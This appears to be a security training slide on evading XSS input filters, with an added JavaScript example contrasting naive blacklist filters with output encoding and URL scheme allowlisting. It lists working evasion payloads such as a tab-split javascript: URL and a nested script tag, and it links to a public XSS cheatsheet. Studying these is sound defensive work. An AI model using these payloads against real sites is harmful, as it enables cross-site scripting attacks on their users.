Attack Alert :: XSS Evasion
Attacker input filtering evasion:
No whitespace
<img src="java	script:alert('vulnerable');">
Blacklist script tags
<scr<script>ipt>
Using alternate character encodings
&#00001100p...
Maxsize limits in fields
Chop exploit and join via /* */
XSS cheatsheet
http://ha.ckers.org/xss.html
(local mirror)
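Why the blacklist and embedded-whitespace items above defeat substring filters, and what holds up instead, as an added example that is not part of the original slides. The function names and the `example.invalid` base URL are assumptions; the two inputs are the slide's own strings, with the whitespace inside `java script` written as `\t`.

```javascript
// Added example; all function names are hypothetical.

// Weak: single-pass blacklist removal of <script> tags.
function naiveStripScript(input) {
  return input.replace(/<\/?script>/gi, "");
}

// Weak: substring check for a blacklisted URL scheme.
function naiveUrlCheck(url) {
  return !url.toLowerCase().includes("javascript:");
}

// Hardened: encode for the HTML context at output time
// instead of deleting "bad" substrings from the input.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: parse the URL the way a browser does (the WHATWG parser
// drops tabs and newlines), then allowlist the resulting scheme.
function isAllowedUrl(url) {
  try {
    const parsed = new URL(url, "https://example.invalid/"); // placeholder base
    return ["http:", "https:"].includes(parsed.protocol);
  } catch {
    return false; // unparseable input is rejected
  }
}

// The slide's inputs.
const nested = "<scr<script>ipt>";
const tabbed = "java\tscript:alert('vulnerable');";

console.log(naiveStripScript(nested)); // removal reassembles the tag
console.log(naiveUrlCheck(tabbed));    // substring filter lets it through
console.log(escapeHtml(nested));       // inert text after encoding
console.log(isAllowedUrl(tabbed));     // scheme allowlist rejects it
```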